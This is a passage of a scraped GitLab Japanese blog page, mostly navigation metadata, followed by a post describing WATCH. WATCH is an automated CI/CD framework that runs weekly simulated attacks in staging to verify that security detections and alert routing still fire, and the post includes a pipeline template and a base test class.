gitlab-discovers-widespread-npm-supply-chain-attack\n",{"config":33,"title":5,"description":26,"ogImage":35},{"noIndex":34},false,"https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/v1749665667/Blog/Hero%20Images/built-in-security.jpg","ja-jp/blog/gitlab-discovers-widespread-npm-supply-chain-attack",[24,38],"security-research",[24,25],"OtcLUhOP7ZjDCV2AHBobK3ad4lGwyLZuW2JeFm2VEnc",{"logo":42,"freeTrial":47,"sales":52,"login":57,"items":62,"search":382,"minimal":415,"duo":432,"switchNav":441,"pricingDeployment":452},{"config":43},{"href":44,"dataGaName":45,"dataGaLocation":46},"/ja-jp/","gitlab logo","header",{"text":48,"config":49},"無料トライアルを開始",{"href":50,"dataGaName":51,"dataGaLocation":46},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/ja-jp&glm_content=default-saas-trial/","free trial",{"text":53,"config":54},"お問い合わせ",{"href":55,"dataGaName":56,"dataGaLocation":46},"/ja-jp/sales/","sales",{"text":58,"config":59},"サインイン",{"href":60,"dataGaName":61,"dataGaLocation":46},"https://gitlab.com/users/sign_in/","sign in",[63,92,194,199,302,363],{"text":64,"config":65,"menu":67},"プラットフォーム",{"dataNavLevelOne":66},"platform",{"type":68,"columns":69},"cards",[70,76,84],{"title":64,"description":71,"link":72},"DevSecOpsに特化したインテリジェントオーケストレーションプラットフォーム",{"text":73,"config":74},"プラットフォームを探索",{"href":75,"dataGaName":66,"dataGaLocation":46},"/ja-jp/platform/",{"title":77,"description":78,"link":79},"GitLab Duo Agent Platform","ソフトウェアライフサイクル全体を支えるエージェント型AI",{"text":80,"config":81},"GitLab Duoのご紹介",{"href":82,"dataGaName":83,"dataGaLocation":46},"/ja-jp/gitlab-duo-agent-platform/","gitlab duo agent platform",{"title":85,"description":86,"link":87},"GitLabが選ばれる理由","エンタープライズがGitLabを選ぶ主な理由をご覧ください",{"text":88,"config":89},"詳細はこちら",{"href":90,"dataGaName":91,"dataGaLocation":46},"/ja-jp/why-gitlab/","why gitlab",{"text":93,"left":15,"config":94,"menu":96},"製品",{"dataNavLevelOne":95},"solutions",{"type":97,"link":98,"columns":102,"feature":173},"lists",{"text":99,"config":100},"すべてのソリューションを表示",{"href":101,"dataGaName":95,"dataGaLocation":46},"/ja-jp/solutions/",[103,128,151],{"title":104,"description":105,"link":106,"items":111},"自動化","CI/CDと自動化でデプロイを加速",{"config":107},{"icon":108,"href":109,"dataGaName":110,"dataGaLocation":46},"AutomatedCodeAlt","/ja-jp/solutions/delivery-automation/","automated software delivery",[112,116,119,124],{"text":113,"config":114},"CI/CD",{"href":115,"dataGaLocation":46,"dataGaName":113},"/ja-jp/solutions/continuous-integration/",{"text":77,"config":117},{"href":82,"dataGaLocation":46,"dataGaName":118},"gitlab duo agent platform - product menu",{"text":120,"config":121},"ソースコード管理",{"href":122,"dataGaLocation":46,"dataGaName":123},"/ja-jp/solutions/source-code-management/","Source Code Management",{"text":125,"config":126},"自動化されたソフトウェアデリバリー",{"href":109,"dataGaLocation":46,"dataGaName":127},"Automated software delivery",{"title":129,"description":130,"link":131,"items":136},"セキュリティ","セキュリティを犠牲にすることなくコード作成を高速化",{"config":132},{"href":133,"dataGaName":134,"dataGaLocation":46,"icon":135},"/ja-jp/solutions/application-security-testing/","security and compliance","ShieldCheckLight",[137,141,146],{"text":138,"config":139},"アプリケーションセキュリティテスト",{"href":133,"dataGaName":140,"dataGaLocation":46},"Application security testing",{"text":142,"config":143},"ソフトウェアサプライチェーンの安全性",{"href":144,"dataGaLocation":46,"dataGaName":145},"/ja-jp/solutions/supply-chain/","Software supply chain security",{"text":147,"config":148},"ソフトウェアコンプライアンス",{"href":149,"dataGaName":150,"dataGaLocation":46},"/ja-jp/solutions/software-compliance/","software compliance",{"title":152,"link":153,"items":158},"測定",{"config":154},{"icon":155,"href":156,"dataGaName":157,"dataGaLocation":46},"DigitalTransformation","/ja-jp/solutions/visibility-measurement/","visibility and measurement",[159,163,168],{"text":160,"config":161},"可視性と測定",{"href":156,"dataGaLocation":46,"dataGaName":162},"Visibility and Measurement",{"text":164,"config":165},"バリューストリーム管理",{"href":166,"dataGaLocation":46,"dataGaName":167},"/ja-jp/solutions/value-stream-management/","Value Stream Management",{"text":169,"config":170},"分析とインサイト",{"href":171,"dataGaLocation":46,"dataGaName":172},"/ja-jp/solutions/analytics-and-insights/","Analytics and insights",{"title":174,"type":97,"items":175},"GitLabが活躍する場所",[176,182,188],{"text":177,"config":178},"エンタープライズ",{"icon":179,"href":180,"dataGaLocation":46,"dataGaName":181},"Building","/ja-jp/enterprise/","enterprise",{"text":183,"config":184},"スモールビジネス",{"icon":185,"href":186,"dataGaLocation":46,"dataGaName":187},"Work","/ja-jp/small-business/","small business",{"text":189,"config":190},"公共部門",{"icon":191,"href":192,"dataGaLocation":46,"dataGaName":193},"Organization","/ja-jp/solutions/public-sector/","public sector",{"text":195,"config":196},"価格",{"href":197,"dataGaName":198,"dataGaLocation":46,"dataNavLevelOne":198},"/ja-jp/pricing/","pricing",{"text":200,"config":201,"menu":203},"リソース",{"dataNavLevelOne":202},"resources",{"type":97,"link":204,"columns":208,"feature":288},{"text":205,"config":206},"すべてのリソースを表示",{"href":207,"dataGaName":202,"dataGaLocation":46},"/ja-jp/resources/",[209,242,260],{"title":210,"items":211},"はじめに",[212,217,222,227,232,237],{"text":213,"config":214},"インストール",{"href":215,"dataGaName":216,"dataGaLocation":46},"/ja-jp/install/","install",{"text":218,"config":219},"クイックスタートガイド",{"href":220,"dataGaName":221,"dataGaLocation":46},"/ja-jp/get-started/","quick setup checklists",{"text":223,"config":224},"学ぶ",{"href":225,"dataGaLocation":46,"dataGaName":226},"https://university.gitlab.com/","learn",{"text":228,"config":229},"製品ドキュメント",{"href":230,"dataGaName":231,"dataGaLocation":46},"https://docs.gitlab.com/ja-jp/","product documentation",{"text":233,"config":234},"ベストプラクティスビデオ",{"href":235,"dataGaName":236,"dataGaLocation":46},"/ja-jp/getting-started-videos/","best practice videos",{"text":238,"config":239},"インテグレーション",{"href":240,"dataGaName":241,"dataGaLocation":46},"/ja-jp/integrations/","integrations",{"title":243,"items":244},"検索する",[245,250,255],{"text":246,"config":247},"お客様成功事例",{"href":248,"dataGaName":249,"dataGaLocation":46},"/ja-jp/customers/","customer success stories",{"text":251,"config":252},"ブログ",{"href":253,"dataGaName":254,"dataGaLocation":46},"/ja-jp/blog/","blog",{"text":256,"config":257},"リモート",{"href":258,"dataGaName":259,"dataGaLocation":46},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"title":261,"items":262},"つなげる",[263,268,273,278,283],{"text":264,"config":265},"GitLabサービス",{"href":266,"dataGaName":267,"dataGaLocation":46},"/ja-jp/services/","services",{"text":269,"config":270},"コミュニティ",{"href":271,"dataGaName":272,"dataGaLocation":46},"/community/","community",{"text":274,"config":275},"フォーラム",{"href":276,"dataGaName":277,"dataGaLocation":46},"https://forum.gitlab.com/","forum",{"text":279,"config":280},"イベント",{"href":281,"dataGaName":282,"dataGaLocation":46},"/events/","events",{"text":284,"config":285},"パートナー",{"href":286,"dataGaName":287,"dataGaLocation":46},"/ja-jp/partners/","partners",{"config":289,"text":292,"image":293,"link":297},{"background":290,"textColor":291},"#2f2a6b","#fff","ソフトウェア開発の未来への洞察",{"altText":294,"config":295},"ソースプロモカード",{"src":296},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758208064/dzl0dbift9xdizyelkk4.svg",{"text":298,"config":299},"最新情報を読む",{"href":300,"dataGaName":301,"dataGaLocation":46},"/ja-jp/the-source/","the source",{"text":303,"config":304,"menu":306},"会社情報",{"dataNavLevelOne":305},"company",{"type":97,"columns":307},[308],{"items":309},[310,315,321,323,328,333,338,343,348,353,358],{"text":311,"config":312},"GitLabについて",{"href":313,"dataGaName":314,"dataGaLocation":46},"/ja-jp/company/","about",{"text":316,"config":317,"footerGa":320},"採用情報",{"href":318,"dataGaName":319,"dataGaLocation":46},"/jobs/","jobs",{"dataGaName":319},{"text":279,"config":322},{"href":281,"dataGaName":282,"dataGaLocation":46},{"text":324,"config":325},"経営陣",{"href":326,"dataGaName":327,"dataGaLocation":46},"/company/team/e-group/","leadership",{"text":329,"config":330},"チーム",{"href":331,"dataGaName":332,"dataGaLocation":46},"/company/team/","team",{"text":334,"config":335},"ハンドブック",{"href":336,"dataGaName":337,"dataGaLocation":46},"https://handbook.gitlab.com/","handbook",{"text":339,"config":340},"投資家向け情報",{"href":341,"dataGaName":342,"dataGaLocation":46},"https://ir.gitlab.com/","investor relations",{"text":344,"config":345},"トラストセンター",{"href":346,"dataGaName":347,"dataGaLocation":46},"/ja-jp/security/","trust center",{"text":349,"config":350},"AI Transparency Center",{"href":351,"dataGaName":352,"dataGaLocation":46},"/ja-jp/ai-transparency-center/","ai transparency center",{"text":354,"config":355},"ニュースレター",{"href":356,"dataGaName":357,"dataGaLocation":46},"/company/contact/#contact-forms","newsletter",{"text":359,"config":360},"プレス",{"href":361,"dataGaName":362,"dataGaLocation":46},"/press/","press",{"text":53,"config":364,"menu":365},{"dataNavLevelOne":305},{"type":97,"columns":366},[367],{"items":368},[369,372,377],{"text":53,"config":370},{"href":55,"dataGaName":371,"dataGaLocation":46},"talk to sales",{"text":373,"config":374},"サポートを受ける",{"href":375,"dataGaName":376,"dataGaLocation":46},"https://support.gitlab.com","support portal",{"text":378,"config":379},"カスタマーポータル",{"href":380,"dataGaName":381,"dataGaLocation":46},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":383,"login":384,"suggestions":391},"閉じる",{"text":385,"link":386},"リポジトリとプロジェクトを検索するには、次にログインします",{"text":387,"config":388},"GitLab.com",{"href":60,"dataGaName":389,"dataGaLocation":390},"search login","search",{"text":392,"default":393},"提案",[394,396,401,403,407,411],{"text":77,"config":395},{"href":82,"dataGaName":77,"dataGaLocation":390},{"text":397,"config":398},"コード提案（AI）",{"href":399,"dataGaName":400,"dataGaLocation":390},"/ja-jp/solutions/code-suggestions/","Code Suggestions (AI)",{"text":113,"config":402},{"href":115,"dataGaName":113,"dataGaLocation":390},{"text":404,"config":405},"GitLab on AWS",{"href":406,"dataGaName":404,"dataGaLocation":390},"/ja-jp/partners/technology-partners/aws/",{"text":408,"config":409},"GitLab on Google Cloud",{"href":410,"dataGaName":408,"dataGaLocation":390},"/ja-jp/partners/technology-partners/google-cloud-platform/",{"text":412,"config":413},"GitLabを選ぶ理由",{"href":90,"dataGaName":414,"dataGaLocation":390},"Why GitLab?",{"freeTrial":416,"mobileIcon":420,"desktopIcon":425,"secondaryButton":428},{"text":48,"config":417},{"href":418,"dataGaName":51,"dataGaLocation":419},"https://gitlab.com/-/trials/new/","nav",{"altText":421,"config":422},"GitLabアイコン",{"src":423,"dataGaName":424,"dataGaLocation":419},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":421,"config":426},{"src":427,"dataGaName":424,"dataGaLocation":419},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":210,"config":429},{"href":430,"dataGaName":431,"dataGaLocation":419},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/ja-jp/get-started/","get started",{"freeTrial":433,"mobileIcon":437,"desktopIcon":439},{"text":434,"config":435},"GitLab Duoの詳細について",{"href":82,"dataGaName":436,"dataGaLocation":419},"gitlab duo",{"altText":421,"config":438},{"src":423,"dataGaName":424,"dataGaLocation":419},{"altText":421,"config":440},{"src":427,"dataGaName":424,"dataGaLocation":419},{"button":442,"mobileIcon":447,"desktopIcon":449},{"text":443,"config":444},"/switch",{"href":445,"dataGaName":446,"dataGaLocation":419},"#contact","switch",{"altText":421,"config":448},{"src":423,"dataGaName":424,"dataGaLocation":419},{"altText":421,"config":450},{"src":451,"dataGaName":424,"dataGaLocation":419},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":453,"mobileIcon":458,"desktopIcon":460},{"text":454,"config":455},"価格ページに戻る",{"href":197,"dataGaName":456,"dataGaLocation":419,"icon":457},"back to pricing","GoBack",{"altText":421,"config":459},{"src":423,"dataGaName":424,"dataGaLocation":419},{"altText":421,"config":461},{"src":427,"dataGaName":424,"dataGaLocation":419},{"title":463,"button":464,"config":469},"エージェント型AIがソフトウェア配信をどのように変革するかをご覧ください",{"text":465,"config":466},"6月10日のGitLab Transcendに申し込む",{"href":467,"dataGaName":468,"dataGaLocation":46},"/ja-jp/releases/whats-new/#sign-up","transcend event",{"layout":470,"icon":471,"disabled":34},"release","AiStar",{"data":473},{"text":474,"source":475,"edit":481,"contribute":486,"config":491,"items":496,"minimal":699},"GitはSoftware Freedom Conservancyの商標です。当社は「GitLab」をライセンスに基づいて使用しています",{"text":476,"config":477},"ページのソースを表示",{"href":478,"dataGaName":479,"dataGaLocation":480},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":482,"config":483},"このページを編集",{"href":484,"dataGaName":485,"dataGaLocation":480},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":487,"config":488},"ご協力をお願いします",{"href":489,"dataGaName":490,"dataGaLocation":480},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":492,"facebook":493,"youtube":494,"linkedin":495},"https://twitter.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[497,542,595,638,665],{"title":195,"links":498,"subMenu":513},[499,503,508],{"text":500,"config":501},"プランの表示",{"href":197,"dataGaName":502,"dataGaLocation":480},"view plans",{"text":504,"config":505},"Premiumを選ぶ理由",{"href":506,"dataGaName":507,"dataGaLocation":480},"/ja-jp/pricing/premium/","why premium",{"text":509,"config":510},"Ultimateを選ぶ理由",{"href":511,"dataGaName":512,"dataGaLocation":480},"/ja-jp/pricing/ultimate/","why ultimate",[514],{"title":53,"links":515},[516,518,520,522,527,532,537],{"text":53,"config":517},{"href":55,"dataGaName":56,"dataGaLocation":480},{"text":373,"config":519},{"href":375,"dataGaName":376,"dataGaLocation":480},{"text":378,"config":521},{"href":380,"dataGaName":381,"dataGaLocation":480},{"text":523,"config":524},"ステータス",{"href":525,"dataGaName":526,"dataGaLocation":480},"https://status.gitlab.com/","status",{"text":528,"config":529},"利用規約",{"href":530,"dataGaName":531,"dataGaLocation":480},"/terms/","terms of use",{"text":533,"config":534},"プライバシーに関する声明",{"href":535,"dataGaName":536,"dataGaLocation":480},"/ja-jp/privacy/","privacy statement",{"text":538,"config":539},"Cookie 優先設定",{"dataGaName":540,"dataGaLocation":480,"id":541,"isOneTrustButton":15},"cookie preferences","ot-sdk-btn",{"title":93,"links":543,"subMenu":552},[544,548],{"text":545,"config":546},"DevSecOpsプラットフォーム",{"href":75,"dataGaName":547,"dataGaLocation":480},"devsecops platform",{"text":549,"config":550},"AI支援開発",{"href":82,"dataGaName":551,"dataGaLocation":480},"ai-assisted development",[553],{"title":554,"links":555},"トピック",[556,560,565,570,575,580,585,590],{"text":113,"config":557},{"href":558,"dataGaName":559,"dataGaLocation":480},"/ja-jp/topics/ci-cd/","cicd",{"text":561,"config":562},"GitOps",{"href":563,"dataGaName":564,"dataGaLocation":480},"/ja-jp/topics/gitops/","gitops",{"text":566,"config":567},"DevOps",{"href":568,"dataGaName":569,"dataGaLocation":480},"/ja-jp/topics/devops/","devops",{"text":571,"config":572},"バージョン管理",{"href":573,"dataGaName":574,"dataGaLocation":480},"/ja-jp/topics/version-control/","version control",{"text":576,"config":577},"DevSecOps",{"href":578,"dataGaName":579,"dataGaLocation":480},"/ja-jp/topics/devsecops/","devsecops",{"text":581,"config":582},"クラウドネイティブ",{"href":583,"dataGaName":584,"dataGaLocation":480},"/ja-jp/topics/cloud-native/","cloud native",{"text":586,"config":587},"コーディングのためのAI",{"href":588,"dataGaName":589,"dataGaLocation":480},"/ja-jp/topics/devops/ai-for-coding/","ai for coding",{"text":591,"config":592},"エージェント型AI",{"href":593,"dataGaName":594,"dataGaLocation":480},"/ja-jp/topics/agentic-ai/","agentic ai",{"title":596,"links":597},"ソリューション",[598,601,603,608,612,615,618,621,623,625,628,633],{"text":138,"config":599},{"href":133,"dataGaName":600,"dataGaLocation":480},"Application Security Testing",{"text":125,"config":602},{"href":109,"dataGaName":110,"dataGaLocation":480},{"text":604,"config":605},"アジャイル開発",{"href":606,"dataGaName":607,"dataGaLocation":480},"/ja-jp/solutions/agile-delivery/","agile delivery",{"text":609,"config":610},"SCM",{"href":122,"dataGaName":611,"dataGaLocation":480},"source code management",{"text":113,"config":613},{"href":115,"dataGaName":614,"dataGaLocation":480},"continuous integration & delivery",{"text":164,"config":616},{"href":166,"dataGaName":617,"dataGaLocation":480},"value stream management",{"text":561,"config":619},{"href":620,"dataGaName":564,"dataGaLocation":480},"/ja-jp/solutions/gitops/",{"text":177,"config":622},{"href":180,"dataGaName":181,"dataGaLocation":480},{"text":183,"config":624},{"href":186,"dataGaName":187,"dataGaLocation":480},{"text":626,"config":627},"公共機関",{"href":192,"dataGaName":193,"dataGaLocation":480},{"text":629,"config":630},"教育",{"href":631,"dataGaName":632,"dataGaLocation":480},"/ja-jp/solutions/education/","education",{"text":634,"config":635},"金融サービス",{"href":636,"dataGaName":637,"dataGaLocation":480},"/ja-jp/solutions/finance/","financial services",{"title":200,"links":639},[640,642,644,646,649,651,653,655,657,659,661,663],{"text":213,"config":641},{"href":215,"dataGaName":216,"dataGaLocation":480},{"text":218,"config":643},{"href":220,"dataGaName":221,"dataGaLocation":480},{"text":223,"config":645},{"href":225,"dataGaName":226,"dataGaLocation":480},{"text":228,"config":647},{"href":230,"dataGaName":648,"dataGaLocation":480},"docs",{"text":251,"config":650},{"href":253,"dataGaName":254,"dataGaLocation":480},{"text":246,"config":652},{"href":248,"dataGaName":249,"dataGaLocation":480},{"text":256,"config":654},{"href":258,"dataGaName":259,"dataGaLocation":480},{"text":264,"config":656},{"href":266,"dataGaName":267,"dataGaLocation":480},{"text":269,"config":658},{"href":271,"dataGaName":272,"dataGaLocation":480},{"text":274,"config":660},{"href":276,"dataGaName":277,"dataGaLocation":480},{"text":279,"config":662},{"href":281,"dataGaName":282,"dataGaLocation":480},{"text":284,"config":664},{"href":286,"dataGaName":287,"dataGaLocation":480},{"title":303,"links":666},[667,669,671,673,675,677,679,683,688,690,692,694],{"text":311,"config":668},{"href":313,"dataGaName":305,"dataGaLocation":480},{"text":316,"config":670},{"href":318,"dataGaName":319,"dataGaLocation":480},{"text":324,"config":672},{"href":326,"dataGaName":327,"dataGaLocation":480},{"text":329,"config":674},{"href":331,"dataGaName":332,"dataGaLocation":480},{"text":334,"config":676},{"href":336,"dataGaName":337,"dataGaLocation":480},{"text":339,"config":678},{"href":341,"dataGaName":342,"dataGaLocation":480},{"text":680,"config":681},"Sustainability",{"href":682,"dataGaName":680,"dataGaLocation":480},"/sustainability/",{"text":684,"config":685},"ダイバーシティ、インクルージョン、ビロンギング（DIB）",{"href":686,"dataGaName":687,"dataGaLocation":480},"/ja-jp/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":344,"config":689},{"href":346,"dataGaName":347,"dataGaLocation":480},{"text":354,"config":691},{"href":356,"dataGaName":357,"dataGaLocation":480},{"text":359,"config":693},{"href":361,"dataGaName":362,"dataGaLocation":480},{"text":695,"config":696},"現代奴隷制の透明性に関する声明",{"href":697,"dataGaName":698,"dataGaLocation":480},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"items":700},[701,703,706],{"text":528,"config":702},{"href":530,"dataGaName":531,"dataGaLocation":480},{"text":704,"config":705},"Cookieの設定",{"dataGaName":540,"dataGaLocation":480,"id":541,"isOneTrustButton":15},{"text":533,"config":707},{"href":535,"dataGaName":536,"dataGaLocation":480},[709,722],{"id":710,"title":10,"body":28,"config":711,"content":713,"description":28,"extension":27,"meta":717,"navigation":15,"path":718,"seo":719,"stem":720,"__hash__":721},"blogAuthors/en-us/blog/authors/michael-henriksen.yml",{"template":712},"BlogAuthor",{"name":10,"config":714},{"headshot":715,"ctfId":716},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659488/Blog/Author%20Headshots/gitlab-logo-extra-whitespace.png","3DmojnawcJFqAgoNMCpFTX",{},"/en-us/blog/authors/michael-henriksen",{},"en-us/blog/authors/michael-henriksen","dTL4-g73rNy2nzSawJkuBZzClePkjmBsk3b5cEkIceg",{"id":723,"title":11,"body":28,"config":724,"content":726,"description":28,"extension":27,"meta":729,"navigation":15,"path":730,"seo":731,"stem":732,"__hash__":733},"blogAuthors/en-us/blog/authors/daniel-abeles.yml",{"template":712,"gitlabHandle":725},"dabeles",{"name":11,"config":727},{"headshot":728},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1764021550/s0jlolynjykik4qzfznr.png",{},"/en-us/blog/authors/daniel-abeles",{},"en-us/blog/authors/daniel-abeles","Jk9qNn2qJBh633zCEZSFpYFUYNt83twJ-Ge9wrn_oT0",[735,749],{"content":736,"config":747},{"heroImage":737,"body":738,"authors":739,"updatedDate":741,"date":742,"title":743,"tags":744,"description":746,"category":13},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772195014/ooezwusxjl1f7ijfmbvj.png","セキュリティ運用センター（SOC）において健全なアラートシステムを維持する上で、誤検出のチューニングは課題の半分にすぎません。見落とされがちなもう一方の課題は、めったに発火しない重要な検知ルールが、誰にも気づかれないまま完全に機能しなくなっていないかを確認することです。\n\nGitLabでは、Signals Engineeringチームが自社インフラ上で実際の悪意ある行動をシミュレートすることで検知テストを実施しています。ログソースからインジェスション、SIEMへの取り込み、そしてSOARによるアラートルーティングまで、検知がエンドツーエンドで機能することを検証するためです。これは商用のBreach and Attack Simulation（BAS）ツールと同じアプローチですが、それらのツールは高価で汎用的であり、私たちの検知スタックに特化したものではありません。そこで私たちは、Weekly Attack Testing for Continuous Health、略して**WATCH**と名付けた完全自動化フレームワークを自社で構築しました。\n\n本記事では、このフレームワークを開発した背景、その仕組み、そして自社環境での活用方法についてご説明します。\n\n##  検知の検証におけるギャップ\n\nログスキーマの変更、SIEMのアップデート、パイプラインの設定ミスなど、検知がサイレントに失敗する原因は無数に存在します。一方、期待通りに発火するパターンはただひとつです。こうした現実を踏まえると、結論は明らかです。「既存の検知を意図的にトリガーしてみよう！」ただし、すぐに次の疑問が浮かびます。「どうやって検知をトリガーするのか？」「どのくらいの頻度で行うべきか？」\n\n検知をトリガーする方法のひとつは、悪意ある行動をシミュレートするログをSIEMに再投入するという「合成アプローチ」です。そして、検知ルールが偽の問題を検知してアラートを発するかどうかを確認します。ただしこのアプローチには、「実世界」のシナリオで検知が機能することを証明できないという問題に加え、アラートライフサイクルの中でも特にエラーが発生しやすいログインジェスション（ログソースからSIEMまでの経路）の検証ができないという欠点があります。\n\n以前、私たちは[GitLab Universal Automated Response and Detection（GUARD）システム](https://about.gitlab.com/blog/automating-cybersecurity-threat-detections-with-gitlab-ci-cd/)がDetections as Code（DaC）パイプラインを通じて検知の作成とデプロイを自動化する方法、そしてSOARを通じてアラートのルーティングとトリアージを行う方法についてご紹介しました。DaCパイプラインはエラーなしに検知を*デプロイできる*ことの検証問題を解決しましたが、対象とする行動が実際に発生した際にその検知が*発火するか*という問いには答えられていません。\n\nWATCHはそのギャップを埋めます。検知が機能しているという確信を与えてくれる継続的な検証レイヤーです。\n\n## WATCHの仕組み\n\n大まかに言えば、WATCHはステージング環境でスクリプト化された攻撃シミュレーションを実行し、期待されるアラートがセキュリティ監視スタック全体に伝播することを検証します。検知ルールを管理するSIEM、アラートルーティングを担うSOAR、そしてチームが検知の健全性を監視するダッシュボードに至るまでを確認します。\n\nWATCHテストのライフサイクルは次のとおりです。\n\n1. **スケジューリング**: 毎週、スケジュールされたGitLab CI/CDパイプラインがすべてのアクティブなテストを検出し、週全体にわたってランダムな時間スロットに振り分けます。ランダム化は重要です。テストが予測可能なタイミングで発火すると、テスト活動と実際の脅威を区別しやすくなり、タイミングに敏感な検知の問題をマスクしてしまう可能性があるためです。\n2. **事前通知**: テスト実行前に、WATCHは専用の「WATCH Heads Up」ストーリーを通じてSOARに通知し、トリガーが期待される検知を登録します。これにより、SOARが次に何が来るかを把握できるよう、追跡可能なレコードが作成されます。\n3. **実行**: テストがシミュレートされた悪意ある行動を実行します。たとえば、管理者アカウントのパスワードをリセットしたり、ステージング環境に対して不審なAPI呼び出しを行ったりします。\n4. **検知**: SIEMがステージング環境からのアクティビティログを処理し、対応する検知ルールを（うまくいけば）発火させます。\n5. **相関分析**: SOARにアラートが届くと、「これはWATCHテストか？」のチェックが行われ、各アラートが登録済みのテストに対応するかどうかを3つの要素で照合します。テスト実行からアラート到着までの時間ウィンドウ、アクターのID（IPアドレスまたはユーザー名）、そして発火した検知のルールIDです。これにより、WATCHが生成したアラートがSIRTへの実際のインシデントとしてエスカレーションされることなく、パイプライン全体の検証が可能になります。\n6. **検証**: フォローアップのパイプラインステージが、期待されるすべての検知が発火したかどうかを確認し、検知のステータスメタデータを更新し、更新された結果をGitLab Pagesダッシュボードにデプロイします。いずれかの検知が発火しなかった場合、チームのSlackチャンネルに通知が送られます。\n\n## GitLab CI/CDでWATCHを使う\n\nWATCHは3つのパイプラインステージにわたるオーケストレーションのバックボーンとしてGitLab CI/CDを活用しています。\n\n**schedule_pipelines**ステージは毎週実行され、テストの配布を担います。すべてのアクティブなテストを検出し、グループに振り分け、週全体にわたってランダムな時間帯に実行するようスケジュールされたパイプラインを作成します。スケジュールされた各パイプラインには、実行すべきテストを指定する`TESTS_TO_RUN`変数が付与されます。\n\n**run_tests**ステージでは実際の攻撃シミュレーションが行われます。そのパイプライン実行に割り当てられたテストを実行し、実行統計を`detection_status.json`に保存し、アラートの相関分析がダウンストリームで行えるようSOARのレコードIDを記録します。\n\n**pages**ステージは検証とレポートを担います。SOARに問い合わせてアラートが生成され適切にルーティングされたことを確認し、検証結果で検知メタデータを更新し、最新のテスト結果をGitLab Pagesダッシュボードにデプロイします。\n\n以下は、WATCHパイプライン用のGitLab CI/CD `gitlab-ci.yml`設定ファイルのテンプレートです。\n\n```\nspec:\n  inputs:\n    weekly_scheduling:\n      type: boolean\n      default: false\n      description: \"Enable weekly scheduling of detection tests.\"\n    update_pages:\n      type: boolean\n      default: false\n      description: \"For triggering the update of GitLab Pages dashboard.\"\n\n---\n\n# Specify the Docker image to use for the job\nimage: python:3.12\n\nstages:\n  - schedule_pipelines\n  - run_tests\n  - pages\n\n# Job to manage scheduled pipelines (runs when weekly_scheduling input is true)\nmanage_scheduled_pipelines:\n  stage: schedule_pipelines\n  script:\n    - pip install -r requirements.txt\n    - python scripts/manage_scheduled_pipelines.py\n  rules:\n    - if: $TESTS_TO_RUN == null && $CI_PIPELINE_SOURCE == \"schedule\" && [[ inputs.weekly_scheduling ]] == true\n      when: on_success\n    - when: never\n\n# Job to run detection tests, save tines_record_id to detection_status.json, and commit\nrun_detection_tests:\n  stage: run_tests\n  script:\n    - pip install -r requirements.txt\n    - python main.py --prod --save-stats --scheduled-tests\n  rules:\n    - if: $TESTS_TO_RUN\n      when: on_success\n    - when: never\n\n# Job to verify alerts, update detection_status.json, commit, and deploy pages\npages:\n  stage: pages\n  script:\n    - pip install -r requirements.txt\n    - python scripts/verify_and_update_detections.py --tines-api-key ${TINES_API_KEY}\n    - mkdir -p public/data\n    - cp detection_status.json public/data/\n    - cp -r static/* public/\n  pages: true  # Required for GitLab 17.9+ to trigger Pages deployment\n  artifacts:\n    paths:\n      - public\n  rules:\n    - if: $TESTS_TO_RUN == null && [[ inputs.update_pages ]] == true\n      when: on_success\n    - when: never\n```\n\n## GitLab Duoを使ったテストの作成\n\nWATCHの設計における優先事項のひとつは、Signals EngineeringまたはSIRTチームの誰でも新しいテストを追加できるようにすることでした。このフレームワークは`BaseSecurityTest`抽象クラスを提供しており、テストIDの生成、アクターIDの管理、SOARとの連携といった定型作業をすべて処理します。これにより、テスト作成者はテスト環境のセットアップ、シミュレートされた悪意ある行動の実行、後処理の3点にのみ集中できます。\n\n```py\nclass BaseSecurityTest(ABC):\n\n    def __init__(self, config = {}, test_id: Optional[str] = None):\n        self.test_id = test_id or str(uuid.uuid4())\n        self.test_name = self.__class__.__name__\n        self.expected_detections = {}\n        self.actor_id = config.get('gitlab', {}).get(\n            'default_actor_id',\n            \"sirt_detection_test_user_\" + self.test_id[:8]\n        )\n        self.isActive = True\n        self.test_run_time = 300\n        self.config = config\n\n    @abstractmethod\n    def setup(self) -> bool:\n        \"\"\"Prepare test environment and resources\"\"\"\n\n    @abstractmethod\n    def execute(self) -> Dict[str, Any]:\n        \"\"\"Execute the malicious behavior simulation\"\"\"\n\n    @abstractmethod\n    def cleanup(self) -> bool:\n        \"\"\"Clean up test environment and resources\"\"\"\n```\n\n重要な設定は`expected_detections`ディクショナリです。これは、トリガーが期待されるSIEMのルール名を、アクターIDと期待されるアラート到着時刻にマッピングします。新しいテストは、`tests/`ディレクトリ内に`BaseSecurityTest`をサブクラス化したPythonファイルを作成し、シミュレートする行動を定義して、トリガーが期待される検知を宣言するだけです。テストランナーは次回のスケジュール実行時に自動的にそれを検出します。\n\nこの低摩擦なインターフェースが重要なのは、チームが実際にテストを書いてくれなければ、検知テストという取り組み自体が成立しないからです。テストの追加にパイプライン内部の全体像の理解が必要になれば、誰もやらなくなります。setup、execute、cleanupを実装し、期待される検知を宣言するというシンプルな仕様は、WATCHテストを[GitLab 